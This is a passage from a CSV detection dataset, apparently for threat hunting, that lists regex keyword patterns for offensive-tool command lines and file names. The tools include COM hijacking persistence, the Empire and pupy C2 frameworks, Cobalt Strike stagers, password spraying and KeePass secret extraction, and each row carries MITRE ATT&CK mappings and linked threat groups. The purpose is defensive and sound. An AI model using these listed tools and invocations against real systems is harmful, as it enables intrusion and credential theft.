*.dll*",".{0,1000}\sPersist\sGeneral\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistence tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","2586" "* Persist Tasksch *.dll*",".{0,1000}\sPersist\sTasksch\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistence tool written in C#","T1122 - 
T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","2587" "* Persist TreatAs *.dll*",".{0,1000}\sPersist\sTreatAs\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistence tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","2588" "* persist_hkcu_run*",".{0,1000}\spersist_hkcu_run.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#registry","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2589" "* Persistence.sh*",".{0,1000}\sPersistence\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","2590" "* -PersistenceScriptName *",".{0,1000}\s\-PersistenceScriptName\s.{0,1000}","offensive_tool_keyword","empire","Empire 
scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2591" "* -PersistentScriptFilePath *",".{0,1000}\s\-PersistentScriptFilePath\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2592" "* PersistViaScheduledTask.ahk*",".{0,1000}\sPersistViaScheduledTask\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - 
TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","2593" "* PetitPotato.cpp*",".{0,1000}\sPetitPotato\.cpp.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","2594" "* PEzor.py *",".{0,1000}\sPEzor\.py\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","2595" "* PEzor.sh *",".{0,1000}\sPEzor\.sh\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - 
TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","2596" "* PEzor.sh *",".{0,1000}\sPEzor\.sh\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","2597" "* -pfx *.pfx -dc-ip *",".{0,1000}\s\-pfx\s.{0,1000}\.pfx\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2598" "* 
pgsql-brute.nse*",".{0,1000}\spgsql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2601" "* PhishCreds.ps1*",".{0,1000}\sPhishCreds\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2602" "* physmem2minidump.py*",".{0,1000}\sphysmem2minidump\.py.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","2603" "* -pi \\\\\\\\.\\\\pipe\\\\*",".{0,1000}\s\-pi\s\\\\\\\\\\\\\\\\\.\\\\\\\\pipe\\\\\\\\.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral 
Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","2604" "* Pictures\Screenshots\loot.zip*",".{0,1000}\sPictures\\Screenshots\\loot\.zip.{0,1000}","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","2605" "* --pid * --disable --privilege SeDebugPrivilege*",".{0,1000}\s\-\-pid\s.{0,1000}\s\-\-disable\s\-\-privilege\sSeDebugPrivilege.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","2606" "*----------------------- Pillage Modules -----------------------*",".{0,1000}\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\sPillage\sModules\s\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","2607" "* PingSweep.ps1*",".{0,1000}\sPingSweep\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - 
T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2608" "* --pinject *",".{0,1000}\s\-\-pinject\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","2609" "* -PipeName * -ServiceName * -Command whoami*",".{0,1000}\s\-PipeName\s.{0,1000}\s\-ServiceName\s.{0,1000}\s\-Command\swhoami.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","N/A","9","2","163","25","2024-12-05T16:30:18Z","2023-09-06T16:00:47Z","2610" "* --pipename *\\pipe\\atctl\*",".{0,1000}\s\-\-pipename\s.{0,1000}\\\\pipe\\\\atctl\\.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","2611" "* pipename_stager *",".{0,1000}\spipename_stager\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. 
This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","2612" "* -pipename_stager *",".{0,1000}\s\-pipename_stager\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","2613" "* pjl-info-config.nse*",".{0,1000}\spjl\-info\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","0","N/A","N/A","N/A","7","627","59","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z","2614" "* pjl-ready-message.nse*",".{0,1000}\spjl\-ready\-message\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2615" "* --plugin gmailenum*",".{0,1000}\s\-\-plugin\sgmailenum.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","2616" "* --plugin httpbrute --url *",".{0,1000}\s\-\-plugin\shttpbrute\s\-\-url\s.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","2617" "* --plugin 
httpbrute*",".{0,1000}\s\-\-plugin\shttpbrute.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","2618" "* --plugin KeeFarceRebornPlugin.dll*",".{0,1000}\s\-\-plugin\sKeeFarceRebornPlugin\.dll.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2619" "* --plugin KeeFarceRebornPlugin.dll*",".{0,1000}\s\-\-plugin\sKeeFarceRebornPlugin\.dll.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","2620" "* --plugin o365enum*",".{0,1000}\s\-\-plugin\so365enum.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","2621" "* pngZIP.ps1*",".{0,1000}\spngZIP\.ps1.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data 
Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","2622" "* Podalirius (@podalirius_)*",".{0,1000}Author\s\s\s\s\s\s\s\s\s\s\s\s\s\:\sPodalirius\s\(\@podalirius_\).{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","2623" "* Poisoners-Session.log*",".{0,1000}\sPoisoners\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","2624" "* polenum.py*",".{0,1000}\spolenum\.py.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","2625" "* PoolParty.cpp*",".{0,1000}\sPoolParty\.cpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","2626" "* PoolParty.exe*",".{0,1000}\sPoolParty\.exe.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense 
Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","2627" "* pop3-brute.nse*",".{0,1000}\spop3\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2628" "* pop3-capabilities.nse*",".{0,1000}\spop3\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2629" "* pop3-ntlm-info.nse*",".{0,1000}\spop3\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2630" "* popcalc.bin *",".{0,1000}\spopcalc\.bin\s.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red 